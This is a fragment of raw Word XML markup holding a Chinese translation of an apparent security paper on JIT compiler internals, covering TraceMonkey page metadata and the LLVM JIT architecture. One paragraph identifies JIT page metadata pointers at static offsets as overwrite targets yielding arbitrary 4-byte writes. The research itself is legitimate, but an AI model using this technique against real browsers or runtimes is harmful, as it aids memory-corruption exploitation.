    <w:p w14:paraId="1363B105" w14:textId="26C61AE4" w:rsidR="0026102A" w:rsidRDefault="00691AB9" w:rsidP="001C7552">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3039"/>
        </w:tabs>
        <w:spacing w:before="19"/>
        <w:ind w:left="544"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NIns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>* e</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">d; </w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指向该</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b</w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的结尾</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728AB919" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="39"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEBDB55" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494A3168" w14:textId="3F89F728" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="115"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>NIns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">[1]; </w:t>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="001C7552">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:color w:val="222222"/>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>本机编译代码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E564157" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="18"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E15894A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="14"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B4097D3" w14:textId="5467FC60" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="407"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以在每个JIT页面的开头以已知的静态偏移</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>量找到此</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>元数据。这些指针是攻击者有吸引力的覆盖目标。覆盖它们的值将导致在存储器中的任何地方进行任意4字节写入。此攻击类似于各种</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>堆实现</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>中的早期</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>u</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nlink</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>攻击。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280D5F7B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2414C5D5" w14:textId="56EF22A3" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>除了在JIT中</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ooking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>特定功能之外，我们的</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>itter</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>工具链还使用</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此数据遍历分配的JIT页面。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF62F2E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E7CD765" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>可以在Mozilla的网站[1]上找到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TraceMonkey</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>体系结构的详细图像。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566015CE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F31710E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_bookmark4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM JIT架构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CAEB2B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11ACBC99" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="462"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">LLVM是一个编译器基础结构，其中包括用于编译过程所有阶段的库和工具。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LLVM迅速成为Mac</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>X和iOS设备首选的工具链，例如Rubinius的JIT实施，以及即将推出的针对Google</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Native </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Client（NaCL）项目的PNaCL组件的JIT组件</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">。 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM本身不包含任何安全性边界，并致力于实现远远超过完整性的性能（即，位代码解析，代码发射以及其他核心功能都信任其所有输入）。但是，在LLVM成为将JIT支持添加到现有代码库的实际项目时，我们仍然将精力集中在LLVM上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACBE33E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AD99B0F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="283" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="475"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM将源代码编译为内部定义良好的表示形式，</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>该表示</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">形式具有三种语义等效的形式：文本汇编形式，二进制位码格式和C ++ API。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Rubinius</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>直接通过其API使用LLVM，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PNaCL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>使用位码</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>作为移动代码介质。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391E90FA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AC8A7B" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="488"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">在实现级别，LLVM IR表示为捕获IR语义和拓扑的C ++对象图。 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">BasicBlocks代表一系列IR指令（由Instruction类表示），每个IR指令均引用一个或多个操作数和值（均从Value基类派生）。 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LLVM将所有代码和引用打包到模块中，类似于C的翻译单元</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A496B59" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="29"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DA806ED" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="595"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>由于LLVM是作为一组库而不是一个整体项目设计的，因此前端编译器，优化器，位代码处理和所有其他主要任务被单独捆绑在一起，并且相互依赖性最小。我们只专注于LLVM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321EAAE2" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D8E7272" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="75" w:line="295" w:lineRule="auto"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>程序集/位代码</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>解析器</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>和每当使用LLVM JIT时嵌入的JIT执行引擎。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC97128" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1706DB08" w14:textId="75B1550B" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="452"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>为了开</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>始执行，LLVM首先通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Bitco</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>deRea</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>der</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>加载位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>代码，以实现内部表示。 LLVM</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>延迟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>地编译实例化代码，并且仅会首先</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>生成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>入口函数（通常是main或</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>analog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）及其所需的</w:t>
      </w:r>
      <w:r w:rsidR="0087509B">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>所有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数据。所有外部</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>均通过PLT</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>。每当发出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>对非编译函</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>数的调用时，都会调用</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>stub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，该</w:t>
      </w:r>
      <w:r w:rsidR="00762A93">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>stub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>调用LLVM的编译函数（在X86体系结构的lib / Target / X86 / X86JITInfo.cpp中定义的X86CompilationCallback）。仅在调用目标函数期间才发出它。生成代码块后，所有引用该代码块的全局映射都会更新。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0D9107" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C81B28E" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_bookmark5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>LLVM用途</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ABB28C" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="35"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63ED9134" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="449"/>
        <w:rPr>
